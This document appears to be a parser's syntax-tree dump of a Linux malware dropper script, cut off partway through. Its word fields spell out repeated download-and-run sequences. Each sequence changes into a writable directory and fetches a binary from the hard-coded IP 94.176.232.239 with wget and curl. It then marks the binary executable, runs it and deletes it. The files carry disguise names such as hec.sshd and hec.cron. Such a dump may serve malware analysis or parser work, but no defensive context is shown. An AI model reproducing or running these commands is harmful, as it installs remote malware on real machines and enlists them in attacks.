ListNode(lineno=2, pos=(12, 190), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 102), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 102), word='http://94.176.232.239/hec.ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(102, 103)),
  CommandNode(lineno=2, pos=(104, 142), parts=[
    WordNode(lineno=2, pos=(104, 108), word='curl'),
    WordNode(lineno=2, pos=(109, 111), word='-O'),
    WordNode(lineno=2, pos=(112, 142), word='http://94.176.232.239/hec.ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(142, 143)),
  CommandNode(lineno=2, pos=(144, 161), parts=[
    WordNode(lineno=2, pos=(144, 149), word='chmod'),
    WordNode(lineno=2, pos=(150, 152), word='+x'),
    WordNode(lineno=2, pos=(153, 161), word='hec.ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(161, 162)),
  CommandNode(lineno=2, pos=(163, 173), parts=[
    WordNode(lineno=2, pos=(163, 173), word='./hec.ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(173, 174)),
  CommandNode(lineno=2, pos=(175, 190), parts=[
    WordNode(lineno=2, pos=(175, 177), word='rm'),
    WordNode(lineno=2, pos=(178, 181), word='-rf'),
    WordNode(lineno=2, pos=(182, 190), word='hec.ntpd'),
  ]),
])
ListNode(lineno=3, pos=(191, 369), parts=[
  CommandNode(lineno=3, pos=(191, 198), parts=[
    WordNode(lineno=3, pos=(191, 193), word='cd'),
    WordNode(lineno=3, pos=(194, 198), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(199, 201)),
  CommandNode(lineno=3, pos=(202, 213), parts=[
    WordNode(lineno=3, pos=(202, 204), word='cd'),
    WordNode(lineno=3, pos=(205, 213), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(214, 216)),
  CommandNode(lineno=3, pos=(217, 224), parts=[
    WordNode(lineno=3, pos=(217, 219), word='cd'),
    WordNode(lineno=3, pos=(220, 224), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(225, 227)),
  CommandNode(lineno=3, pos=(228, 236), parts=[
    WordNode(lineno=3, pos=(228, 230), word='cd'),
    WordNode(lineno=3, pos=(231, 236), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(237, 239)),
  CommandNode(lineno=3, pos=(240, 244), parts=[
    WordNode(lineno=3, pos=(240, 242), word='cd'),
    WordNode(lineno=3, pos=(243, 244), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(244, 245)),
  CommandNode(lineno=3, pos=(246, 281), parts=[
    WordNode(lineno=3, pos=(246, 250), word='wget'),
    WordNode(lineno=3, pos=(251, 281), word='http://94.176.232.239/hec.sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(281, 282)),
  CommandNode(lineno=3, pos=(283, 321), parts=[
    WordNode(lineno=3, pos=(283, 287), word='curl'),
    WordNode(lineno=3, pos=(288, 290), word='-O'),
    WordNode(lineno=3, pos=(291, 321), word='http://94.176.232.239/hec.sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(321, 322)),
  CommandNode(lineno=3, pos=(323, 340), parts=[
    WordNode(lineno=3, pos=(323, 328), word='chmod'),
    WordNode(lineno=3, pos=(329, 331), word='+x'),
    WordNode(lineno=3, pos=(332, 340), word='hec.sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(340, 341)),
  CommandNode(lineno=3, pos=(342, 352), parts=[
    WordNode(lineno=3, pos=(342, 352), word='./hec.sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(352, 353)),
  CommandNode(lineno=3, pos=(354, 369), parts=[
    WordNode(lineno=3, pos=(354, 356), word='rm'),
    WordNode(lineno=3, pos=(357, 360), word='-rf'),
    WordNode(lineno=3, pos=(361, 369), word='hec.sshd'),
  ]),
])
ListNode(lineno=4, pos=(370, 563), parts=[
  CommandNode(lineno=4, pos=(370, 377), parts=[
    WordNode(lineno=4, pos=(370, 372), word='cd'),
    WordNode(lineno=4, pos=(373, 377), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(378, 380)),
  CommandNode(lineno=4, pos=(381, 392), parts=[
    WordNode(lineno=4, pos=(381, 383), word='cd'),
    WordNode(lineno=4, pos=(384, 392), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(393, 395)),
  CommandNode(lineno=4, pos=(396, 403), parts=[
    WordNode(lineno=4, pos=(396, 398), word='cd'),
    WordNode(lineno=4, pos=(399, 403), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(404, 406)),
  CommandNode(lineno=4, pos=(407, 415), parts=[
    WordNode(lineno=4, pos=(407, 409), word='cd'),
    WordNode(lineno=4, pos=(410, 415), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(416, 418)),
  CommandNode(lineno=4, pos=(419, 423), parts=[
    WordNode(lineno=4, pos=(419, 421), word='cd'),
    WordNode(lineno=4, pos=(422, 423), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(423, 424)),
  CommandNode(lineno=4, pos=(425, 463), parts=[
    WordNode(lineno=4, pos=(425, 429), word='wget'),
    WordNode(lineno=4, pos=(430, 463), word='http://94.176.232.239/hec.openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(463, 464)),
  CommandNode(lineno=4, pos=(465, 506), parts=[
    WordNode(lineno=4, pos=(465, 469), word='curl'),
    WordNode(lineno=4, pos=(470, 472), word='-O'),
    WordNode(lineno=4, pos=(473, 506), word='http://94.176.232.239/hec.openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(506, 507)),
  CommandNode(lineno=4, pos=(508, 528), parts=[
    WordNode(lineno=4, pos=(508, 513), word='chmod'),
    WordNode(lineno=4, pos=(514, 516), word='+x'),
    WordNode(lineno=4, pos=(517, 528), word='hec.openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(528, 529)),
  CommandNode(lineno=4, pos=(530, 543), parts=[
    WordNode(lineno=4, pos=(530, 543), word='./hec.openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(543, 544)),
  CommandNode(lineno=4, pos=(545, 563), parts=[
    WordNode(lineno=4, pos=(545, 547), word='rm'),
    WordNode(lineno=4, pos=(548, 551), word='-rf'),
    WordNode(lineno=4, pos=(552, 563), word='hec.openssh'),
  ]),
])
ListNode(lineno=5, pos=(564, 742), parts=[
  CommandNode(lineno=5, pos=(564, 571), parts=[
    WordNode(lineno=5, pos=(564, 566), word='cd'),
    WordNode(lineno=5, pos=(567, 571), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(572, 574)),
  CommandNode(lineno=5, pos=(575, 586), parts=[
    WordNode(lineno=5, pos=(575, 577), word='cd'),
    WordNode(lineno=5, pos=(578, 586), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(587, 589)),
  CommandNode(lineno=5, pos=(590, 597), parts=[
    WordNode(lineno=5, pos=(590, 592), word='cd'),
    WordNode(lineno=5, pos=(593, 597), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(598, 600)),
  CommandNode(lineno=5, pos=(601, 609), parts=[
    WordNode(lineno=5, pos=(601, 603), word='cd'),
    WordNode(lineno=5, pos=(604, 609), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(610, 612)),
  CommandNode(lineno=5, pos=(613, 617), parts=[
    WordNode(lineno=5, pos=(613, 615), word='cd'),
    WordNode(lineno=5, pos=(616, 617), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(617, 618)),
  CommandNode(lineno=5, pos=(619, 654), parts=[
    WordNode(lineno=5, pos=(619, 623), word='wget'),
    WordNode(lineno=5, pos=(624, 654), word='http://94.176.232.239/hec.bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(654, 655)),
  CommandNode(lineno=5, pos=(656, 694), parts=[
    WordNode(lineno=5, pos=(656, 660), word='curl'),
    WordNode(lineno=5, pos=(661, 663), word='-O'),
    WordNode(lineno=5, pos=(664, 694), word='http://94.176.232.239/hec.bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(694, 695)),
  CommandNode(lineno=5, pos=(696, 713), parts=[
    WordNode(lineno=5, pos=(696, 701), word='chmod'),
    WordNode(lineno=5, pos=(702, 704), word='+x'),
    WordNode(lineno=5, pos=(705, 713), word='hec.bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(713, 714)),
  CommandNode(lineno=5, pos=(715, 725), parts=[
    WordNode(lineno=5, pos=(715, 725), word='./hec.bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(725, 726)),
  CommandNode(lineno=5, pos=(727, 742), parts=[
    WordNode(lineno=5, pos=(727, 729), word='rm'),
    WordNode(lineno=5, pos=(730, 733), word='-rf'),
    WordNode(lineno=5, pos=(734, 742), word='hec.bash'),
  ]),
])
ListNode(lineno=6, pos=(743, 921), parts=[
  CommandNode(lineno=6, pos=(743, 750), parts=[
    WordNode(lineno=6, pos=(743, 745), word='cd'),
    WordNode(lineno=6, pos=(746, 750), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(751, 753)),
  CommandNode(lineno=6, pos=(754, 765), parts=[
    WordNode(lineno=6, pos=(754, 756), word='cd'),
    WordNode(lineno=6, pos=(757, 765), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(766, 768)),
  CommandNode(lineno=6, pos=(769, 776), parts=[
    WordNode(lineno=6, pos=(769, 771), word='cd'),
    WordNode(lineno=6, pos=(772, 776), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(777, 779)),
  CommandNode(lineno=6, pos=(780, 788), parts=[
    WordNode(lineno=6, pos=(780, 782), word='cd'),
    WordNode(lineno=6, pos=(783, 788), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(789, 791)),
  CommandNode(lineno=6, pos=(792, 796), parts=[
    WordNode(lineno=6, pos=(792, 794), word='cd'),
    WordNode(lineno=6, pos=(795, 796), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(796, 797)),
  CommandNode(lineno=6, pos=(798, 833), parts=[
    WordNode(lineno=6, pos=(798, 802), word='wget'),
    WordNode(lineno=6, pos=(803, 833), word='http://94.176.232.239/hec.tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(833, 834)),
  CommandNode(lineno=6, pos=(835, 873), parts=[
    WordNode(lineno=6, pos=(835, 839), word='curl'),
    WordNode(lineno=6, pos=(840, 842), word='-O'),
    WordNode(lineno=6, pos=(843, 873), word='http://94.176.232.239/hec.tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(873, 874)),
  CommandNode(lineno=6, pos=(875, 892), parts=[
    WordNode(lineno=6, pos=(875, 880), word='chmod'),
    WordNode(lineno=6, pos=(881, 883), word='+x'),
    WordNode(lineno=6, pos=(884, 892), word='hec.tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(892, 893)),
  CommandNode(lineno=6, pos=(894, 904), parts=[
    WordNode(lineno=6, pos=(894, 904), word='./hec.tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(904, 905)),
  CommandNode(lineno=6, pos=(906, 921), parts=[
    WordNode(lineno=6, pos=(906, 908), word='rm'),
    WordNode(lineno=6, pos=(909, 912), word='-rf'),
    WordNode(lineno=6, pos=(913, 921), word='hec.tftp'),
  ]),
])
ListNode(lineno=7, pos=(922, 1100), parts=[
  CommandNode(lineno=7, pos=(922, 929), parts=[
    WordNode(lineno=7, pos=(922, 924), word='cd'),
    WordNode(lineno=7, pos=(925, 929), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(930, 932)),
  CommandNode(lineno=7, pos=(933, 944), parts=[
    WordNode(lineno=7, pos=(933, 935), word='cd'),
    WordNode(lineno=7, pos=(936, 944), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(945, 947)),
  CommandNode(lineno=7, pos=(948, 955), parts=[
    WordNode(lineno=7, pos=(948, 950), word='cd'),
    WordNode(lineno=7, pos=(951, 955), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(956, 958)),
  CommandNode(lineno=7, pos=(959, 967), parts=[
    WordNode(lineno=7, pos=(959, 961), word='cd'),
    WordNode(lineno=7, pos=(962, 967), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(968, 970)),
  CommandNode(lineno=7, pos=(971, 975), parts=[
    WordNode(lineno=7, pos=(971, 973), word='cd'),
    WordNode(lineno=7, pos=(974, 975), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(975, 976)),
  CommandNode(lineno=7, pos=(977, 1012), parts=[
    WordNode(lineno=7, pos=(977, 981), word='wget'),
    WordNode(lineno=7, pos=(982, 1012), word='http://94.176.232.239/hec.wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1012, 1013)),
  CommandNode(lineno=7, pos=(1014, 1052), parts=[
    WordNode(lineno=7, pos=(1014, 1018), word='curl'),
    WordNode(lineno=7, pos=(1019, 1021), word='-O'),
    WordNode(lineno=7, pos=(1022, 1052), word='http://94.176.232.239/hec.wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1052, 1053)),
  CommandNode(lineno=7, pos=(1054, 1071), parts=[
    WordNode(lineno=7, pos=(1054, 1059), word='chmod'),
    WordNode(lineno=7, pos=(1060, 1062), word='+x'),
    WordNode(lineno=7, pos=(1063, 1071), word='hec.wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1071, 1072)),
  CommandNode(lineno=7, pos=(1073, 1083), parts=[
    WordNode(lineno=7, pos=(1073, 1083), word='./hec.wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1083, 1084)),
  CommandNode(lineno=7, pos=(1085, 1100), parts=[
    WordNode(lineno=7, pos=(1085, 1087), word='rm'),
    WordNode(lineno=7, pos=(1088, 1091), word='-rf'),
    WordNode(lineno=7, pos=(1092, 1100), word='hec.wget'),
  ]),
])
ListNode(lineno=8, pos=(1101, 1279), parts=[
  CommandNode(lineno=8, pos=(1101, 1108), parts=[
    WordNode(lineno=8, pos=(1101, 1103), word='cd'),
    WordNode(lineno=8, pos=(1104, 1108), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1109, 1111)),
  CommandNode(lineno=8, pos=(1112, 1123), parts=[
    WordNode(lineno=8, pos=(1112, 1114), word='cd'),
    WordNode(lineno=8, pos=(1115, 1123), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1124, 1126)),
  CommandNode(lineno=8, pos=(1127, 1134), parts=[
    WordNode(lineno=8, pos=(1127, 1129), word='cd'),
    WordNode(lineno=8, pos=(1130, 1134), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1135, 1137)),
  CommandNode(lineno=8, pos=(1138, 1146), parts=[
    WordNode(lineno=8, pos=(1138, 1140), word='cd'),
    WordNode(lineno=8, pos=(1141, 1146), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1147, 1149)),
  CommandNode(lineno=8, pos=(1150, 1154), parts=[
    WordNode(lineno=8, pos=(1150, 1152), word='cd'),
    WordNode(lineno=8, pos=(1153, 1154), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1154, 1155)),
  CommandNode(lineno=8, pos=(1156, 1191), parts=[
    WordNode(lineno=8, pos=(1156, 1160), word='wget'),
    WordNode(lineno=8, pos=(1161, 1191), word='http://94.176.232.239/hec.cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1191, 1192)),
  CommandNode(lineno=8, pos=(1193, 1231), parts=[
    WordNode(lineno=8, pos=(1193, 1197), word='curl'),
    WordNode(lineno=8, pos=(1198, 1200), word='-O'),
    WordNode(lineno=8, pos=(1201, 1231), word='http://94.176.232.239/hec.cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1231, 1232)),
  CommandNode(lineno=8, pos=(1233, 1250), parts=[
    WordNode(lineno=8, pos=(1233, 1238), word='chmod'),
    WordNode(lineno=8, pos=(1239, 1241), word='+x'),
    WordNode(lineno=8, pos=(1242, 1250), word='hec.cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1250, 1251)),
  CommandNode(lineno=8, pos=(1252, 1262), parts=[
    WordNode(lineno=8, pos=(1252, 1262), word='./hec.cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1262, 1263)),
  CommandNode(lineno=8, pos=(1264, 1279), parts=[
    WordNode(lineno=8, pos=(1264, 1266), word='rm'),
    WordNode(lineno=8, pos=(1267, 1270), word='-rf'),
    WordNode(lineno=8, pos=(1271, 1279), word='hec.cron'),
  ]),
])
ListNode(lineno=9, pos=(1280, 1453), parts=[
  CommandNode(lineno=9, pos=(1280, 1287), parts=[
    WordNode(lineno=9, pos=(1280, 1282), word='cd'),
    WordNode(lineno=9, pos=(1283, 1287), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1288, 1290)),
  CommandNode(lineno=9, pos=(1291, 1302), parts=[
    WordNode(lineno=9, pos=(1291, 1293), word='cd'),
    WordNode(lineno=9, pos=(1294, 1302), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1303, 1305)),
  CommandNode(lineno=9, pos=(1306, 1313), parts=[
    WordNode(lineno=9, pos=(1306, 1308), word='cd'),
    WordNode(lineno=9, pos=(1309, 1313), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1314, 1316)),
  CommandNode(lineno=9, pos=(1317, 1325), parts=[
    WordNode(lineno=9, pos=(1317, 1319), word='cd'),
    WordNode(lineno=9, pos=(1320, 1325), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1326, 1328)),
  CommandNode(lineno=9, pos=(1329, 1333), parts=[
    WordNode(lineno=9, pos=(1329, 1331), word='cd'),
    WordNode(lineno=9, pos=(1332, 1333), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1333, 1334)),
  CommandNode(lineno=9, pos=(1335, 1369), parts=[
    WordNode(lineno=9, pos=(1335, 1339), word='wget'),
    WordNode(lineno=9, pos=(1340, 1369), word='http://94.176.232.239/hec.ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1369, 1370)),
  CommandNode(lineno=9, pos=(1371, 1408), parts=[
    WordNode(lineno=9, pos=(1371, 1375), word='curl'),
    WordNode(lineno=9, pos=(1376, 1378), word='-O'),
    WordNode(lineno=9, pos=(1379, 1408), word='http://94.176.232.239/hec.ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1408, 1409)),
  CommandNode(lineno=9, pos=(1410, 1426), parts=[
    WordNode(lineno=9, pos=(1410, 1415), word='chmod'),
    WordNode(lineno=9, pos=(1416, 1418), word='+x'),
    WordNode(lineno=9, pos=(1419, 1426), word='hec.ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1426, 1427)),
  CommandNode(lineno=9, pos=(1428, 1437), parts=[
    WordNode(lineno=9, pos=(1428, 1437), word='./hec.ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1437, 1438)),
  CommandNode(lineno=9, pos=(1439, 1453), parts=[
    WordNode(lineno=9, pos=(1439, 1441), word='rm'),
    WordNode(lineno=9, pos=(1442, 1445), word='-rf'),
    WordNode(lineno=9, pos=(1446, 1453), word='hec.ftp'),
  ]),
])
ListNode(lineno=10, pos=(1454, 1632), parts=[
  CommandNode(lineno=10, pos=(1454, 1461), parts=[
    WordNode(lineno=10, pos=(1454, 1456), word='cd'),
    WordNode(lineno=10, pos=(1457, 1461), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1462, 1464)),
  CommandNode(lineno=10, pos=(1465, 1476), parts=[
    WordNode(lineno=10, pos=(1465, 1467), word='cd'),
    WordNode(lineno=10, pos=(1468, 1476), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1477, 1479)),
  CommandNode(lineno=10, pos=(1480, 1487), parts=[
    WordNode(lineno=10, pos=(1480, 1482), word='cd'),
    WordNode(lineno=10, pos=(1483, 1487), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1488, 1490)),
  CommandNode(lineno=10, pos=(1491, 1499), parts=[
    WordNode(lineno=10, pos=(1491, 1493), word='cd'),
    WordNode(lineno=10, pos=(1494, 1499), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1500, 1502)),
  CommandNode(lineno=10, pos=(1503, 1507), parts=[
    WordNode(lineno=10, pos=(1503, 1505), word='cd'),
    WordNode(lineno=10, pos=(1506, 1507), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1507, 1508)),
  CommandNode(lineno=10, pos=(1509, 1544), parts=[
    WordNode(lineno=10, pos=(1509, 1513), word='wget'),
    WordNode(lineno=10, pos=(1514, 1544), word='http://94.176.232.239/hec.pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1544, 1545)),
  CommandNode(lineno=10, pos=(1546, 1584), parts=[
    WordNode(lineno=10, pos=(1546, 1550), word='curl'),
    WordNode(lineno=10, pos=(1551, 1553), word='-O'),
    WordNode(lineno=10, pos=(1554, 1584), word='http://94.176.232.239/hec.pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1584, 1585)),
  CommandNode(lineno=10, pos=(1586, 1603), parts=[
    WordNode(lineno=10, pos=(1586, 1591), word='chmod'),
    WordNode(lineno=10, pos=(1592, 1594), word='+x'),
    WordNode(lineno=10, pos=(1595, 1603), word='hec.pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1603, 1604)),
  CommandNode(lineno=10, pos=(1605, 1615), parts=[
    WordNode(lineno=10, pos=(1605, 1615), word='./hec.pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1615, 1616)),
  CommandNode(lineno=10, pos=(1617, 1632), parts=[
    WordNode(lineno=10, pos=(1617, 1619), word='rm'),
    WordNode(lineno=10, pos=(1620, 1623), word='-rf'),
    WordNode(lineno=10, pos=(1624, 1632), word='hec.pftp'),
  ]),
])
ListNode(lineno=11, pos=(1633, 1801), parts=[
  CommandNode(lineno=11, pos=(1633, 1640), parts=[
    WordNode(lineno=11, pos=(1633, 1635), word='cd'),
    WordNode(lineno=11, pos=(1636, 1640), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1641, 1643)),
  CommandNode(lineno=11, pos=(1644, 1655), parts=[
    WordNode(lineno=11, pos=(1644, 1646), word='cd'),
    WordNode(lineno=11, pos=(1647, 1655), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1656, 1658)),
  CommandNode(lineno=11, pos=(1659, 1666), parts=[
    WordNode(lineno=11, pos=(1659, 1661), word='cd'),
    WordNode(lineno=11, pos=(1662, 1666), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1667, 1669)),
  CommandNode(lineno=11, pos=(1670, 1678), parts=[
    WordNode(lineno=11, pos=(1670, 1672), word='cd'),
    WordNode(lineno=11, pos=(1673, 1678), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1679, 1681)),
  CommandNode(lineno=11, pos=(1682, 1686), parts=[
    WordNode(lineno=11, pos=(1682, 1684), word='cd'),
    WordNode(lineno=11, pos=(1685, 1686), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1686, 1687)),
  CommandNode(lineno=11, pos=(1688, 1721), parts=[
    WordNode(lineno=11, pos=(1688, 1692), word='wget'),
    WordNode(lineno=11, pos=(1693, 1721), word='http://94.176.232.239/hec.sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1721, 1722)),
  CommandNode(lineno=11, pos=(1723, 1759), parts=[
    WordNode(lineno=11, pos=(1723, 1727), word='curl'),
    WordNode(lineno=11, pos=(1728, 1730), word='-O'),
    WordNode(lineno=11, pos=(1731, 1759), word='http://94.176.232.239/hec.sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1759, 1760)),
  CommandNode(lineno=11, pos=(1761, 1776), parts=[
    WordNode(lineno=11, pos=(1761, 1766), word='chmod'),
    WordNode(lineno=11, pos=(1767, 1769), word='+x'),
    WordNode(lineno=11, pos=(1770, 1776), word='hec.sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1776, 1777)),
  CommandNode(lineno=11, pos=(1778, 1786), parts=[
    WordNode(lineno=11, pos=(1778, 1786), word='./hec.sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1786, 1787)),
  CommandNode(lineno=11, pos=(1788, 1801), parts=[
    WordNode(lineno=11, pos=(1788, 1790), word='rm'),
    WordNode(lineno=11, pos=(1791, 1794), word='-rf'),
    WordNode(lineno=11, pos=(1795, 1801), word='hec.sh'),
  ]),
])
ListNode(lineno=12, pos=(1802, 1975), parts=[
  CommandNode(lineno=12, pos=(1802, 1809), parts=[
    WordNode(lineno=12, pos=(1802, 1804), word='cd'),
    WordNode(lineno=12, pos=(1805, 1809), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1810, 1812)),
  CommandNode(lineno=12, pos=(1813, 1824), parts=[
    WordNode(lineno=12, pos=(1813, 1815), word='cd'),
    WordNode(lineno=12, pos=(1816, 1824), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1825, 1827)),
  CommandNode(lineno=12, pos=(1828, 1835), parts=[
    WordNode(lineno=12, pos=(1828, 1830), word='cd'),
    WordNode(lineno=12, pos=(1831, 1835), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1836, 1838)),
  CommandNode(lineno=12, pos=(1839, 1847), parts=[
    WordNode(lineno=12, pos=(1839, 1841), word='cd'),
    WordNode(lineno=12, pos=(1842, 1847), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1848, 1850)),
  CommandNode(lineno=12, pos=(1851, 1855), parts=[
    WordNode(lineno=12, pos=(1851, 1853), word='cd'),
    WordNode(lineno=12, pos=(1854, 1855), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1855, 1856)),
  CommandNode(lineno=12, pos=(1857, 1891), parts=[
    WordNode(lineno=12, pos=(1857, 1861), word='wget'),
    WordNode(lineno=12, pos=(1862, 1891), word='http://94.176.232.239/hec.nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1891, 1892)),
  CommandNode(lineno=12, pos=(1893, 1930), parts=[
    WordNode(lineno=12, pos=(1893, 1897), word='curl'),
    WordNode(lineno=12, pos=(1898, 1900), word='-O'),
    WordNode(lineno=12, pos=(1901, 1930), word='http://94.176.232.239/hec.nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1930, 1931)),
  CommandNode(lineno=12, pos=(1932, 1948), parts=[
    WordNode(lineno=12, pos=(1932, 1937), word='chmod'),
    WordNode(lineno=12, pos=(1938, 1940), word='+x'),
    WordNode(lineno=12, pos=(1941, 1948), word='hec.nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1948, 1949)),
  CommandNode(lineno=12, pos=(1950, 1959), parts=[
    WordNode(lineno=12, pos=(1950, 1959), word='./hec.nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1959, 1960)),
  CommandNode(lineno=12, pos=(1961, 1975), parts=[
    WordNode(lineno=12, pos=(1961, 1963), word='rm'),
    WordNode(lineno=12, pos=(1964, 1967), word='-rf'),
    WordNode(lineno=12, pos=(1968, 1975), word='hec.nut'),
  ]),
])
ListNode(lineno=13, pos=(1976, 2169), parts=[
  CommandNode(lineno=13, pos=(1976, 1983), parts=[
    WordNode(lineno=13, pos=(1976, 1978), word='cd'),
    WordNode(lineno=13, pos=(1979, 1983), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1984, 1986)),
  CommandNode(lineno=13, pos=(1987, 1998), parts=[
    WordNode(lineno=13, pos=(1987, 1989), word='cd'),
    WordNode(lineno=13, pos=(1990, 1998), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1999, 2001)),
  CommandNode(lineno=13, pos=(2002, 2009), parts=[
    WordNode(lineno=13, pos=(2002, 2004), word='cd'),
    WordNode(lineno=13, pos=(2005, 2009), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2010, 2012)),
  CommandNode(lineno=13, pos=(2013, 2021), parts=[
    WordNode(lineno=13, pos=(2013, 2015), word='cd'),
    WordNode(lineno=13, pos=(2016, 2021), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(2022, 2024)),
  CommandNode(lineno=13, pos=(2025, 2029), parts=[
